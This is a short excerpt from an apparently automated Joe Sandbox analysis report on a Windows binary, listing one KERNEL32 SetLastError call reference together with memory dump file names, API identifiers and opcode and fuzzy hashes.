                                                  • SetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA246A84
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                  • Instruction ID: a4f52af51b1ad67467a303afd1433ebb21cfb398eacf5c156aceaf118c0df3df
                                                  • Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                  • Instruction Fuzzy Hash: D1117520E19B1381FA149B2DAA1413532917F48FE0F0886B4DF6E077D5EE3CF441B640